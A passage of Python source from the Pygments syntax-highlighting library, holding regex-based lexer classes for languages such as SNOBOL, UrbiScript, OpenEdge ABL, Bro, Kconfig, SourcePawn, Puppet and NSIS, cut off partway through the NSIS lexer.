(r'(body|bundle)(\s+)(\S+)(\s+)(\w+)', bygroups(Keyword, Text, Keyword, Text, Name.Function)), (r'(")([^"]+)(")(\s+)(string|slist|int|real)(\s*)(=>)(\s*)', bygroups(Punctuation,Name.Variable,Punctuation, Text,Keyword.Type,Text,Operator,Text)), (r'(\S+)(\s*)(=>)(\s*)', bygroups(Keyword.Reserved,Text,Operator,Text)), (r'"', String, 'string'), (r'(\w+)(\()', bygroups(Name.Function, Punctuation)), (r'([\w.!&|\(\)]+)(::)', bygroups(Name.Class, Punctuation)), (r'(\w+)(:)', bygroups(Keyword.Declaration,Punctuation)), (r'@[\{\(][^\)\}]+[\}\)]', Name.Variable), (r'[(){},;]', Punctuation), (r'=>', Operator), (r'->', Operator), (r'\d+\.\d+', Number.Float), (r'\d+', Number.Integer), (r'\w+', Name.Function), (r'\s+', Text), ], 'string': [ (r'\$[\{\(]', String.Interpol, 'interpol'), (r'\\.', String.Escape), (r'"', String, '#pop'), (r'\n', String), (r'.', String), ], 'interpol': [ (r'\$[\{\(]', String.Interpol, '#push'), (r'[\}\)]', String.Interpol, '#pop'), (r'[^\$\{\(\)\}]+', String.Interpol), ], 'arglist': [ (r'\)', Punctuation, '#pop'), (r',', Punctuation), (r'\w+', Name.Variable), (r'\s+', Text), ], } class SnobolLexer(RegexLexer): """ Lexer for the SNOBOL4 programming language. Recognizes the common ASCII equivalents of the original SNOBOL4 operators. Does not require spaces around binary operators. *New in Pygments 1.5.* """ name = "Snobol" aliases = ["snobol"] filenames = ['*.snobol'] mimetypes = ['text/x-snobol'] tokens = { # root state, start of line # comments, continuation lines, and directives start in column 1 # as do labels 'root': [ (r'\*.*\n', Comment), (r'[\+\.] ', Punctuation, 'statement'), (r'-.*\n', Comment), (r'END\s*\n', Name.Label, 'heredoc'), (r'[A-Za-z\$][\w$]*', Name.Label, 'statement'), (r'\s+', Text, 'statement'), ], # statement state, line after continuation or label 'statement': [ (r'\s*\n', Text, '#pop'), (r'\s+', Text), (r'(?<=[^\w.])(LT|LE|EQ|NE|GE|GT|INTEGER|IDENT|DIFFER|LGT|SIZE|' r'REPLACE|TRIM|DUPL|REMDR|DATE|TIME|EVAL|APPLY|OPSYN|LOAD|UNLOAD|' r'LEN|SPAN|BREAK|ANY|NOTANY|TAB|RTAB|REM|POS|RPOS|FAIL|FENCE|' r'ABORT|ARB|ARBNO|BAL|SUCCEED|INPUT|OUTPUT|TERMINAL)(?=[^\w.])', Name.Builtin), (r'[A-Za-z][\w\.]*', Name), # ASCII equivalents of original operators # | for the EBCDIC equivalent, ! likewise # \ for EBCDIC negation (r'\*\*|[\?\$\.!%\*/#+\-@\|&\\=]', Operator), (r'"[^"]*"', String), (r"'[^']*'", String), # Accept SPITBOL syntax for real numbers # as well as Macro SNOBOL4 (r'[0-9]+(?=[^\.EeDd])', Number.Integer), (r'[0-9]+(\.[0-9]*)?([EDed][-+]?[0-9]+)?', Number.Float), # Goto (r':', Punctuation, 'goto'), (r'[\(\)<>,;]', Punctuation), ], # Goto block 'goto': [ (r'\s*\n', Text, "#pop:2"), (r'\s+', Text), (r'F|S', Keyword), (r'(\()([A-Za-z][\w.]*)(\))', bygroups(Punctuation, Name.Label, Punctuation)) ], # everything after the END statement is basically one # big heredoc. 'heredoc': [ (r'.*\n', String.Heredoc) ] } class UrbiscriptLexer(ExtendedRegexLexer): """ For UrbiScript source code. *New in Pygments 1.5.* """ name = 'UrbiScript' aliases = ['urbiscript'] filenames = ['*.u'] mimetypes = ['application/x-urbiscript'] flags = re.DOTALL ## TODO # - handle Experimental and deprecated tags with specific tokens # - handle Angles and Durations with specific tokens def blob_callback(lexer, match, ctx): text_before_blob = match.group(1) blob_start = match.group(2) blob_size_str = match.group(3) blob_size = int(blob_size_str) yield match.start(), String, text_before_blob ctx.pos += len(text_before_blob) # if blob size doesn't match blob format (example : "\B(2)(aaa)") # yield blob as a string if ctx.text[match.end() + blob_size] != ")": result = "\\B(" + blob_size_str + ")(" yield match.start(), String, result ctx.pos += len(result) return # if blob is well formated, yield as Escape blob_text = blob_start + ctx.text[match.end():match.end()+blob_size] + ")" yield match.start(), String.Escape, blob_text ctx.pos = match.end() + blob_size + 1 # +1 is the ending ")" tokens = { 'root': [ (r'\s+', Text), # comments (r'//.*?\n', Comment), (r'/\*', Comment.Multiline, 'comment'), (r'(?:every|for|loop|while)(?:;|&|\||,)',Keyword), (r'(?:assert|at|break|case|catch|closure|compl|continue|' r'default|else|enum|every|external|finally|for|freezeif|if|new|' r'onleave|return|stopif|switch|this|throw|timeout|try|' r'waituntil|whenever|while)\b', Keyword), (r'(?:asm|auto|bool|char|const_cast|delete|double|dynamic_cast|' r'explicit|export|extern|float|friend|goto|inline|int|' r'long|mutable|namespace|register|reinterpret_cast|short|' r'signed|sizeof|static_cast|struct|template|typedef|typeid|' r'typename|union|unsigned|using|virtual|volatile|' r'wchar_t)\b', Keyword.Reserved), # deprecated keywords, use a meaningfull token when available (r'(?:emit|foreach|internal|loopn|static)\b', Keyword), # ignored keywords, use a meaningfull token when available (r'(?:private|protected|public)\b', Keyword), (r'(?:var|do|const|function|class)\b', Keyword.Declaration), (r'(?:true|false|nil|void)\b', Keyword.Constant), (r'(?:Barrier|Binary|Boolean|CallMessage|Channel|Code|' r'Comparable|Container|Control|Date|Dictionary|Directory|' r'Duration|Enumeration|Event|Exception|Executable|File|Finalizable|' r'Float|FormatInfo|Formatter|Global|Group|Hash|InputStream|' r'IoService|Job|Kernel|Lazy|List|Loadable|Lobby|Location|Logger|Math|' r'Mutex|nil|Object|Orderable|OutputStream|Pair|Path|Pattern|Position|' r'Primitive|Process|Profile|PseudoLazy|PubSub|RangeIterable|Regexp|' r'Semaphore|Server|Singleton|Socket|StackFrame|Stream|String|System|' r'Tag|Timeout|Traceable|TrajectoryGenerator|Triplet|Tuple' r'|UObject|UValue|UVar)\b', Name.Builtin), (r'(?:this)\b', Name.Builtin.Pseudo), # don't match single | and & (r'(?:[-=+*%/<>~^:]+|\.&?|\|\||&&)', Operator), (r'(?:and_eq|and|bitand|bitor|in|not|not_eq|or_eq|or|xor_eq|xor)\b', Operator.Word), (r'[{}\[\]()]+', Punctuation), (r'(?:;|\||,|&|\?|!)+', Punctuation), (r'[$a-zA-Z_][a-zA-Z0-9_]*', Name.Other), (r'0x[0-9a-fA-F]+', Number.Hex), # Float, Integer, Angle and Duration (r'(?:[0-9]+(?:(?:\.[0-9]+)?(?:[eE][+-]?[0-9]+)?)?' r'((?:rad|deg|grad)|(?:ms|s|min|h|d))?)\b', Number.Float), # handle binary blob in strings (r'"', String.Double, "string.double"), (r"'", String.Single, "string.single"), ], 'string.double': [ (r'((?:\\\\|\\"|[^"])*?)(\\B\((\d+)\)\()', blob_callback), (r'(\\\\|\\"|[^"])*?"', String.Double, '#pop'), ], 'string.single': [ (r"((?:\\\\|\\'|[^'])*?)(\\B\((\d+)\)\()", blob_callback), (r"(\\\\|\\'|[^'])*?'", String.Single, '#pop'), ], # from http://pygments.org/docs/lexerdevelopment/#changing-states 'comment': [ (r'[^*/]', Comment.Multiline), (r'/\*', Comment.Multiline, '#push'), (r'\*/', Comment.Multiline, '#pop'), (r'[*/]', Comment.Multiline), ] } class OpenEdgeLexer(RegexLexer): """ Lexer for `OpenEdge ABL (formerly Progress) <http://web.progress.com/en/openedge/abl.html>`_ source code. *New in Pygments 1.5.* """ name = 'OpenEdge ABL' aliases = ['openedge', 'abl', 'progress'] filenames = ['*.p', '*.cls'] mimetypes = ['text/x-openedge', 'application/x-openedge'] types = (r'(?i)(^|(?<=[^0-9a-z_\-]))(CHARACTER|CHAR|CHARA|CHARAC|CHARACT|CHARACTE|' r'COM-HANDLE|DATE|DATETIME|DATETIME-TZ|' r'DECIMAL|DEC|DECI|DECIM|DECIMA|HANDLE|' r'INT64|INTEGER|INT|INTE|INTEG|INTEGE|' r'LOGICAL|LONGCHAR|MEMPTR|RAW|RECID|ROWID)\s*($|(?=[^0-9a-z_\-]))') keywords = (r'(?i)(^|(?<=[^0-9a-z_\-]))(' + r'|'.join(OPENEDGEKEYWORDS) + r')\s*($|(?=[^0-9a-z_\-]))') tokens = { 'root': [ (r'/\*', Comment.Multiline, 'comment'), (r'\{', Comment.Preproc, 'preprocessor'), (r'\s*&.*', Comment.Preproc), (r'0[xX][0-9a-fA-F]+[LlUu]*', Number.Hex), (r'(?i)(DEFINE|DEF|DEFI|DEFIN)\b', Keyword.Declaration), (types, Keyword.Type), (keywords, Name.Builtin), (r'"(\\\\|\\"|[^"])*"', String.Double), (r"'(\\\\|\\'|[^'])*'", String.Single), (r'[0-9][0-9]*\.[0-9]+([eE][0-9]+)?[fd]?', Number.Float), (r'[0-9]+', Number.Integer), (r'\s+', Text), (r'[+*/=-]', Operator), (r'[.:()]', Punctuation), (r'.', Name.Variable), # Lazy catch-all ], 'comment': [ (r'[^*/]', Comment.Multiline), (r'/\*', Comment.Multiline, '#push'), (r'\*/', Comment.Multiline, '#pop'), (r'[*/]', Comment.Multiline) ], 'preprocessor': [ (r'[^{}]', Comment.Preproc), (r'{', Comment.Preproc, '#push'), (r'}', Comment.Preproc, '#pop'), ], } class BroLexer(RegexLexer): """ For `Bro <http://bro-ids.org/>`_ scripts. *New in Pygments 1.5.* """ name = 'Bro' aliases = ['bro'] filenames = ['*.bro'] _hex = r'[0-9a-fA-F_]+' _float = r'((\d*\.?\d+)|(\d+\.?\d*))([eE][-+]?\d+)?' _h = r'[A-Za-z0-9][-A-Za-z0-9]*' tokens = { 'root': [ # Whitespace (r'^@.*?\n', Comment.Preproc), (r'#.*?\n', Comment.Single), (r'\n', Text), (r'\s+', Text), (r'\\\n', Text), # Keywords (r'(add|alarm|break|case|const|continue|delete|do|else|enum|event' r'|export|for|function|if|global|hook|local|module|next' r'|of|print|redef|return|schedule|switch|type|when|while)\b', Keyword), (r'(addr|any|bool|count|counter|double|file|int|interval|net' r'|pattern|port|record|set|string|subnet|table|time|timer' r'|vector)\b', Keyword.Type), (r'(T|F)\b', Keyword.Constant), (r'(&)((?:add|delete|expire)_func|attr|(?:create|read|write)_expire' r'|default|disable_print_hook|raw_output|encrypt|group|log' r'|mergeable|optional|persistent|priority|redef' r'|rotate_(?:interval|size)|synchronized)\b', bygroups(Punctuation, Keyword)), (r'\s+module\b', Keyword.Namespace), # Addresses, ports and networks (r'\d+/(tcp|udp|icmp|unknown)\b', Number), (r'(\d+\.){3}\d+', Number), (r'(' + _hex + r'){7}' + _hex, Number), (r'0x' + _hex + r'(' + _hex + r'|:)*::(' + _hex + r'|:)*', Number), (r'((\d+|:)(' + _hex + r'|:)*)?::(' + _hex + r'|:)*', Number), (r'(\d+\.\d+\.|(\d+\.){2}\d+)', Number), # Hostnames (_h + r'(\.' + _h + r')+', String), # Numeric (_float + r'\s+(day|hr|min|sec|msec|usec)s?\b', Literal.Date), (r'0[xX]' + _hex, Number.Hex), (_float, Number.Float), (r'\d+', Number.Integer), (r'/', String.Regex, 'regex'), (r'"', String, 'string'), # Operators (r'[!%*/+:<=>?~|-]', Operator), (r'([-+=&|]{2}|[+=!><-]=)', Operator), (r'(in|match)\b', Operator.Word), (r'[{}()\[\]$.,;]', Punctuation), # Identfier (r'([_a-zA-Z]\w*)(::)', bygroups(Name, Name.Namespace)), (r'[a-zA-Z_][a-zA-Z_0-9]*', Name) ], 'string': [ (r'"', String, '#pop'), (r'\\([\\abfnrtv"\']|x[a-fA-F0-9]{2,4}|[0-7]{1,3})', String.Escape), (r'[^\\"\n]+', String), (r'\\\n', String), (r'\\', String) ], 'regex': [ (r'/', String.Regex, '#pop'), (r'\\[\\nt/]', String.Regex), # String.Escape is too intense here. (r'[^\\/\n]+', String.Regex), (r'\\\n', String.Regex), (r'\\', String.Regex) ] } class CbmBasicV2Lexer(RegexLexer): """ For CBM BASIC V2 sources. *New in Pygments 1.6.* """ name = 'CBM BASIC V2' aliases = ['cbmbas'] filenames = ['*.bas'] flags = re.IGNORECASE tokens = { 'root': [ (r'rem.*\n', Comment.Single), (r'\s+', Text), (r'new|run|end|for|to|next|step|go(to|sub)?|on|return|stop|cont' r'|if|then|input#?|read|wait|load|save|verify|poke|sys|print#?' r'|list|clr|cmd|open|close|get#?', Keyword.Reserved), (r'data|restore|dim|let|def|fn', Keyword.Declaration), (r'tab|spc|sgn|int|abs|usr|fre|pos|sqr|rnd|log|exp|cos|sin|tan|atn' r'|peek|len|val|asc|(str|chr|left|right|mid)\$', Name.Builtin), (r'[-+*/^<>=]', Operator), (r'not|and|or', Operator.Word), (r'"[^"\n]*.', String), (r'\d+|[-+]?\d*\.\d*(e[-+]?\d+)?', Number.Float), (r'[\(\),:;]', Punctuation), (r'\w+[$%]?', Name), ] } def analyse_text(self, text): # if it starts with a line number, it shouldn't be a "modern" Basic # like VB.net if re.match(r'\d+', text): return True class MscgenLexer(RegexLexer): """ For `Mscgen <http://www.mcternan.me.uk/mscgen/>`_ files. *New in Pygments 1.6.* """ name = 'Mscgen' aliases = ['mscgen', 'msc'] filenames = ['*.msc'] _var = r'([a-zA-Z0-9_]+|"(?:\\"|[^"])*")' tokens = { 'root': [ (r'msc\b', Keyword.Type), # Options (r'(hscale|HSCALE|width|WIDTH|wordwraparcs|WORDWRAPARCS' r'|arcgradient|ARCGRADIENT)\b', Name.Property), # Operators (r'(abox|ABOX|rbox|RBOX|box|BOX|note|NOTE)\b', Operator.Word), (r'(\.|-|\|){3}', Keyword), (r'(?:-|=|\.|:){2}' r'|<<=>>|<->|<=>|<<>>|<:>' r'|->|=>>|>>|=>|:>|-x|-X' r'|<-|<<=|<<|<=|<:|x-|X-|=', Operator), # Names (r'\*', Name.Builtin), (_var, Name.Variable), # Other (r'\[', Punctuation, 'attrs'), (r'\{|\}|,|;', Punctuation), include('comments') ], 'attrs': [ (r'\]', Punctuation, '#pop'), (_var + r'(\s*)(=)(\s*)' + _var, bygroups(Name.Attribute, Text.Whitespace, Operator, Text.Whitespace, String)), (r',', Punctuation), include('comments') ], 'comments': [ (r'(?://|#).*?\n', Comment.Single), (r'/\*(?:.|\n)*?\*/', Comment.Multiline), (r'[ \t\r\n]+', Text.Whitespace) ] } def _rx_indent(level): # Kconfig *always* interprets a tab as 8 spaces, so this is the default. # Edit this if you are in an environment where KconfigLexer gets expanded # input (tabs expanded to spaces) and the expansion tab width is != 8, # e.g. in connection with Trac (trac.ini, [mimeviewer], tab_width). # Value range here is 2 <= {tab_width} <= 8. tab_width = 8 # Regex matching a given indentation {level}, assuming that indentation is # a multiple of {tab_width}. In other cases there might be problems. return r'(?:\t| {1,%s}\t| {%s}){%s}.*\n' % (tab_width-1, tab_width, level) class KconfigLexer(RegexLexer): """ For Linux-style Kconfig files. *New in Pygments 1.6.* """ name = 'Kconfig' aliases = ['kconfig', 'menuconfig', 'linux-config', 'kernel-config'] # Adjust this if new kconfig file names appear in your environment filenames = ['Kconfig', '*Config.in*', 'external.in*', 'standard-modules.in'] mimetypes = ['text/x-kconfig'] # No re.MULTILINE, indentation-aware help text needs line-by-line handling flags = 0 def call_indent(level): # If indentation >= {level} is detected, enter state 'indent{level}' return (_rx_indent(level), String.Doc, 'indent%s' % level) def do_indent(level): # Print paragraphs of indentation level >= {level} as String.Doc, # ignoring blank lines. Then return to 'root' state. return [ (_rx_indent(level), String.Doc), (r'\s*\n', Text), (r'', Generic, '#pop:2') ] tokens = { 'root': [ (r'\s+', Text), (r'#.*?\n', Comment.Single), (r'(mainmenu|config|menuconfig|choice|endchoice|comment|menu|' r'endmenu|visible if|if|endif|source|prompt|select|depends on|' r'default|range|option)\b', Keyword), (r'(---help---|help)[\t ]*\n', Keyword, 'help'), (r'(bool|tristate|string|hex|int|defconfig_list|modules|env)\b', Name.Builtin), (r'[!=&|]', Operator), (r'[()]', Punctuation), (r'[0-9]+', Number.Integer), (r"'(''|[^'])*'", String.Single), (r'"(""|[^"])*"', String.Double), (r'\S+', Text), ], # Help text is indented, multi-line and ends when a lower indentation # level is detected. 'help': [ # Skip blank lines after help token, if any (r'\s*\n', Text), # Determine the first help line's indentation level heuristically(!). # Attention: this is not perfect, but works for 99% of "normal" # indentation schemes up to a max. indentation level of 7. call_indent(7), call_indent(6), call_indent(5), call_indent(4), call_indent(3), call_indent(2), call_indent(1), ('', Text, '#pop'), # for incomplete help sections without text ], # Handle text for indentation levels 7 to 1 'indent7': do_indent(7), 'indent6': do_indent(6), 'indent5': do_indent(5), 'indent4': do_indent(4), 'indent3': do_indent(3), 'indent2': do_indent(2), 'indent1': do_indent(1), } class VGLLexer(RegexLexer): """ For `SampleManager VGL <http://www.thermoscientific.com/samplemanager>`_ source code. *New in Pygments 1.6.* """ name = 'VGL' aliases = ['vgl'] filenames = ['*.rpf'] flags = re.MULTILINE | re.DOTALL | re.IGNORECASE tokens = { 'root': [ (r'\{[^\}]*\}', Comment.Multiline), (r'declare', Keyword.Constant), (r'(if|then|else|endif|while|do|endwhile|and|or|prompt|object' r'|create|on|line|with|global|routine|value|endroutine|constant' r'|global|set|join|library|compile_option|file|exists|create|copy' r'|delete|enable|windows|name|notprotected)(?! *[=<>.,()])', Keyword), (r'(true|false|null|empty|error|locked)', Keyword.Constant), (r'[~\^\*\#!%&\[\]\(\)<>\|+=:;,./?-]', Operator), (r'"[^"]*"', String), (r'(\.)([a-z_\$][a-z0-9_\$]*)', bygroups(Operator, Name.Attribute)), (r'[0-9][0-9]*(\.[0-9]+(e[+\-]?[0-9]+)?)?', Number), (r'[a-z_\$][a-z0-9_\$]*', Name), (r'[\r\n]+', Text), (r'\s+', Text) ] } class SourcePawnLexer(RegexLexer): """ For SourcePawn source code with preprocessor directives. *New in Pygments 1.6.* """ name = 'SourcePawn' aliases = ['sp'] filenames = ['*.sp'] mimetypes = ['text/x-sourcepawn'] #: optional Comment or Whitespace _ws = r'(?:\s|//.*?\n|/\*.*?\*/)+' tokens = { 'root': [ # preprocessor directives: without whitespace ('^#if\s+0', Comment.Preproc, 'if0'), ('^#', Comment.Preproc, 'macro'), # or with whitespace ('^' + _ws + r'#if\s+0', Comment.Preproc, 'if0'), ('^' + _ws + '#', Comment.Preproc, 'macro'), (r'\n', Text), (r'\s+', Text), (r'\\\n', Text), # line continuation (r'/(\\\n)?/(\n|(.|\n)*?[^\\]\n)', Comment.Single), (r'/(\\\n)?\*(.|\n)*?\*(\\\n)?/', Comment.Multiline), (r'[{}]', Punctuation), (r'L?"', String, 'string'), (r"L?'(\\.|\\[0-7]{1,3}|\\x[a-fA-F0-9]{1,2}|[^\\\'\n])'", String.Char), (r'(\d+\.\d*|\.\d+|\d+)[eE][+-]?\d+[LlUu]*', Number.Float), (r'(\d+\.\d*|\.\d+|\d+[fF])[fF]?', Number.Float), (r'0x[0-9a-fA-F]+[LlUu]*', Number.Hex), (r'0[0-7]+[LlUu]*', Number.Oct), (r'\d+[LlUu]*', Number.Integer), (r'\*/', Error), (r'[~!%^&*+=|?:<>/-]', Operator), (r'[()\[\],.;]', Punctuation), (r'(case|const|continue|native|' r'default|else|enum|for|if|new|operator|' r'public|return|sizeof|static|decl|struct|switch)\b', Keyword), (r'(bool|Float)\b', Keyword.Type), (r'(true|false)\b', Keyword.Constant), ('[a-zA-Z_][a-zA-Z0-9_]*', Name), ], 'string': [ (r'"', String, '#pop'), (r'\\([\\abfnrtv"\']|x[a-fA-F0-9]{2,4}|[0-7]{1,3})', String.Escape), (r'[^\\"\n]+', String), # all other characters (r'\\\n', String), # line continuation (r'\\', String), # stray backslash ], 'macro': [ (r'[^/\n]+', Comment.Preproc), (r'/\*(.|\n)*?\*/', Comment.Multiline), (r'//.*?\n', Comment.Single, '#pop'), (r'/', Comment.Preproc), (r'(?<=\\)\n', Comment.Preproc), (r'\n', Comment.Preproc, '#pop'), ], 'if0': [ (r'^\s*#if.*?(?<!\\)\n', Comment.Preproc, '#push'), (r'^\s*#endif.*?(?<!\\)\n', Comment.Preproc, '#pop'), (r'.*?\n', Comment), ] } SM_TYPES = ['Action', 'bool', 'Float', 'Plugin', 'String', 'any', 'AdminFlag', 'OverrideType', 'OverrideRule', 'ImmunityType', 'GroupId', 'AdminId', 'AdmAccessMode', 'AdminCachePart', 'CookieAccess', 'CookieMenu', 'CookieMenuAction', 'NetFlow', 'ConVarBounds', 'QueryCookie', 'ReplySource', 'ConVarQueryResult', 'ConVarQueryFinished', 'Function', 'Action', 'Identity', 'PluginStatus', 'PluginInfo', 'DBResult', 'DBBindType', 'DBPriority', 'PropType', 'PropFieldType', 'MoveType', 'RenderMode', 'RenderFx', 'EventHookMode', 'EventHook', 'FileType', 'FileTimeMode', 'PathType', 'ParamType', 'ExecType', 'DialogType', 'Handle', 'KvDataTypes', 'NominateResult', 'MapChange', 'MenuStyle', 'MenuAction', 'MenuSource', 'RegexError', 'SDKCallType', 'SDKLibrary', 'SDKFuncConfSource', 'SDKType', 'SDKPassMethod', 'RayType', 'TraceEntityFilter', 'ListenOverride', 'SortOrder', 'SortType', 'SortFunc2D', 'APLRes', 'FeatureType', 'FeatureStatus', 'SMCResult', 'SMCError', 'TFClassType', 'TFTeam', 'TFCond', 'TFResourceType', 'Timer', 'TopMenuAction', 'TopMenuObjectType', 'TopMenuPosition', 'TopMenuObject', 'UserMsg'] def __init__(self, **options): self.smhighlighting = get_bool_opt(options, 'sourcemod', True) self._functions = [] if self.smhighlighting: from pygments.lexers._sourcemodbuiltins import FUNCTIONS self._functions.extend(FUNCTIONS) RegexLexer.__init__(self, **options) def get_tokens_unprocessed(self, text): for index, token, value in \ RegexLexer.get_tokens_unprocessed(self, text): if token is Name: if self.smhighlighting: if value in self.SM_TYPES: token = Keyword.Type elif value in self._functions: token = Name.Builtin yield index, token, value class PuppetLexer(RegexLexer): """ For `Puppet <http://puppetlabs.com/>`__ configuration DSL. *New in Pygments 1.6.* """ name = 'Puppet' aliases = ['puppet'] filenames = ['*.pp'] tokens = { 'root': [ include('comments'), include('keywords'), include('names'), include('numbers'), include('operators'), include('strings'), (r'[]{}:(),;[]', Punctuation), (r'[^\S\n]+', Text), ], 'comments': [ (r'\s*#.*$', Comment), (r'/(\\\n)?[*](.|\n)*?[*](\\\n)?/', Comment.Multiline), ], 'operators': [ (r'(=>|\?|<|>|=|\+|-|/|\*|~|!|\|)', Operator), (r'(in|and|or|not)\b', Operator.Word), ], 'names': [ ('[a-zA-Z_][a-zA-Z0-9_]*', Name.Attribute), (r'(\$\S+)(\[)(\S+)(\])', bygroups(Name.Variable, Punctuation, String, Punctuation)), (r'\$\S+', Name.Variable), ], 'numbers': [ # Copypasta from the Python lexer (r'(\d+\.\d*|\d*\.\d+)([eE][+-]?[0-9]+)?j?', Number.Float), (r'\d+[eE][+-]?[0-9]+j?', Number.Float), (r'0[0-7]+j?', Number.Oct), (r'0[xX][a-fA-F0-9]+', Number.Hex), (r'\d+L', Number.Integer.Long), (r'\d+j?', Number.Integer) ], 'keywords': [ # Left out 'group' and 'require' # Since they're often used as attributes (r'(?i)(absent|alert|alias|audit|augeas|before|case|check|class|' r'computer|configured|contained|create_resources|crit|cron|debug|' r'default|define|defined|directory|else|elsif|emerg|err|exec|' r'extlookup|fail|false|file|filebucket|fqdn_rand|generate|host|if|' r'import|include|info|inherits|inline_template|installed|' r'interface|k5login|latest|link|loglevel|macauthorization|' r'mailalias|maillist|mcx|md5|mount|mounted|nagios_command|' r'nagios_contact|nagios_contactgroup|nagios_host|' r'nagios_hostdependency|nagios_hostescalation|nagios_hostextinfo|' r'nagios_hostgroup|nagios_service|nagios_servicedependency|' r'nagios_serviceescalation|nagios_serviceextinfo|' r'nagios_servicegroup|nagios_timeperiod|node|noop|notice|notify|' r'package|present|purged|realize|regsubst|resources|role|router|' r'running|schedule|scheduled_task|search|selboolean|selmodule|' r'service|sha1|shellquote|split|sprintf|ssh_authorized_key|sshkey|' r'stage|stopped|subscribe|tag|tagged|template|tidy|true|undef|' r'unmounted|user|versioncmp|vlan|warning|yumrepo|zfs|zone|' r'zpool)\b', Keyword), ], 'strings': [ (r'"([^"])*"', String), (r'\'([^\'])*\'', String), ], } class NSISLexer(RegexLexer): """ For `NSIS <http://nsis.sourceforge.net/>`_ scripts. *New in Pygments 1.6.* """ name = 'NSIS' aliases = ['nsis', 'nsi', 'nsh'] filenames = ['*.nsi', '*.nsh'] mimetypes = ['text/x-nsis'] flags = re.IGNORECASE tokens = { 'root': [ (r'[;\#].*\n', Comment), (r"'.*?'", String.Single), (r'"', String.Double, 'str_double'), (r'`', String.Backtick, 'str_backtick'), include('macro'), include('interpol'), include('basic'), (r'\$\{[a-z_|][\w|]*\}', Keyword.Pseudo), (r'/[a-z_]\w*', Name.Attribute), ('.', Text), ], 'basic': [ (r'(\n)(Function)(\s+)([._a-z][.\w]*)\b', bygroups(Text, Keyword, Text, Name.Function)), (r'\b([_a-z]\w*)(::)([a-z][a-z0-9]*)\b', bygroups(Keyword.Namespace, Punctuation, Name.Function)), (r'\b([_a-z]\w*)(:)', bygroups(Name.Label, Punctuation)), (r'(\b[ULS]|\B)([\!\<\>=]?=|\<\>?|\>)\B', Operator), (r'[|+-]', Operator), (r'\\', Punctuation), (r'\b(Abort|Add(?:BrandingImage|Size)|' r'Allow(?:RootDirInstall|SkipFiles)|AutoCloseWindow|' r'BG(?:Font|Gradient)|BrandingText|BringToFront|Call(?:InstDLL)?|' r'(?:Sub)?Caption|ChangeUI|CheckBitmap|ClearErrors|CompletedText|' r'ComponentText|CopyFiles|CRCCheck|' r'Create(?:Directory|Font|Shortcut)|Delete(?:INI(?:Sec|Str)|' r'Reg(?:Key|Value))?|DetailPrint|DetailsButtonText|' r'Dir(?:Show|Text|Var|Verify)|(?:Disabled|Enabled)Bitmap|' r'EnableWindow|EnumReg(?:Key|Value)|Exch|Exec(?:Shell|Wait)?|' r'ExpandEnvStrings|File(?:BufSize|Close|ErrorText|Open|' r'Read(?:Byte)?|Seek|Write(?:Byte)?)?|' r'Find(?:Close|First|Next|Window)|FlushINI|Function(?:End)?|' r'Get(?:CurInstType|CurrentAddress|DlgItem|DLLVersion(?:Local)?|' r'ErrorLevel|FileTime(?:Local)?|FullPathName|FunctionAddress|' r'InstDirError|LabelAddress|TempFileName)|' r'Goto|HideWindow|Icon|' r'If(?:Abort|Errors|FileExists|RebootFlag|Silent)|' r'InitPluginsDir|Install(?:ButtonText|Colors|Dir(?:RegKey)?)|' r'Inst(?:ProgressFlags|Type(?:[GS]etText)?)|Int(?:CmpU?|Fmt|Op)|' r'IsWindow|LangString(?:UP)?|' r'License(?:BkColor|Data|ForceSelection|LangString|Text)|' r'LoadLanguageFile|LockWindow|Log(?:Set|Text)|MessageBox|' r'MiscButtonText|Name|Nop|OutFile|(?:Uninst)?Page(?:Ex(?:End)?)?|' r'PluginDir|Pop|Push|Quit|Read(?:(?:Env|INI|Reg)Str|RegDWORD)|' r'Reboot|(?:Un)?RegDLL|Rename|RequestExecutionLevel|ReserveFile|' r'Return|RMDir|SearchPath|Section(?:Divider|End|' r'(?:(?:Get|Set)(?:Flags|InstTypes|Size|Text))|Group(?:End)?|In)?|' r'SendMessage|Set(?:AutoClose|BrandingImage|Compress(?:ionLevel|' r'or(?:DictSize)?)?|CtlColors|CurInstType|DatablockOptimize|' r'DateSave|Details(?:Print|View)|Error(?:s|Level)|FileAttributes|' r'Font|OutPath|Overwrite|PluginUnload|RebootFlag|ShellVarContext|' r'Silent|StaticBkColor)|' r'Show(?:(?:I|Uni)nstDetails|Window)|Silent(?:Un)?Install|Sleep|' r'SpaceTexts|Str(?:CmpS?|Cpy|Len)|SubSection(?:End)?|' r'Uninstall(?:ButtonText|(?:Sub)?Caption|EXEName|Icon|Text)|' r'UninstPage|Var|VI(?:AddVersionKey|ProductVersion)|WindowIcon|' r'Write(?:INIStr|Reg(:?Bin|DWORD|(?:Expand)?Str)|Uninstaller)|' r'XPStyle)\b', Keyword), (r'\b(CUR|END|(?:FILE_ATTRIBUTE_)?' r'(?:ARCHIVE|HIDDEN|NORMAL|OFFLINE|READONLY|SYSTEM|TEMPORARY)|' r'HK(CC|CR|CU|DD|LM|PD|U)|' r'HKEY_(?:CLASSES_ROOT|CURRENT_(?:CONFIG|USER)|DYN_DATA|' r'LOCAL_MACHINE|PERFORMANCE_DATA|USERS)|' r'ID(?:ABORT|CANCEL|IGNORE|NO|OK|RETRY|YES)|' r'MB_(?:ABORTRETRYIGNORE|DEFBUTTON[1-4]|' r'ICON(?:EXCLAMATION|INFORMATION|QUESTION|STOP)|' r'OK(?:CANCEL)?|RETRYCANCEL|RIGHT|SETFOREGROUND|TOPMOST|USERICON|' r'YESNO(?:CANCEL)?)|SET|SHCTX|' r'SW_(?:HIDE|SHOW(?:MAXIMIZED|MINIMIZED|NORMAL))|' r'admin|all|auto|both|bottom|bzip2|checkbox|colored|current|false|' r'force|hide|highest|if(?:diff|newer)|lastused|leave|left|' r'listonly|lzma|nevershow|none|normal|off|on|pop|push|' r'radiobuttons|right|show|silent|silentlog|smooth|textonly|top|' r'true|try|user|zlib)\b', Name.Constant), ], 'macro': [ (r'\!(addincludedir(?:dir)?|addplugindir|appendfile|cd|define|' r'delfilefile|echo(?:message)?|else|endif|error|execute|' r'if(?:macro)?n?(?:def)?|include|insertmacro|macro(?:end)?|packhdr|' r'search(?:parse|replace)|system|tempfilesymbol|undef|verbose|' r'warning)\b', Comment.Preproc), ], 'interpol': [ (r'\$(R?[0-9])', Name.Builtin.Pseudo), # registers (r'\$(ADMINTOOLS|APPDATA|CDBURN_AREA|COOKIES|COMMONFILES(?:32|64)|' r'DESKTOP|DOCUMENTS|EXE(?:DIR|FILE|PATH)|FAVORITES|FONTS|HISTORY|' r'HWNDPARENT|INTERNET_CACHE|LOCALAPPDATA|MUSIC|NETHOOD|PICTURES|' 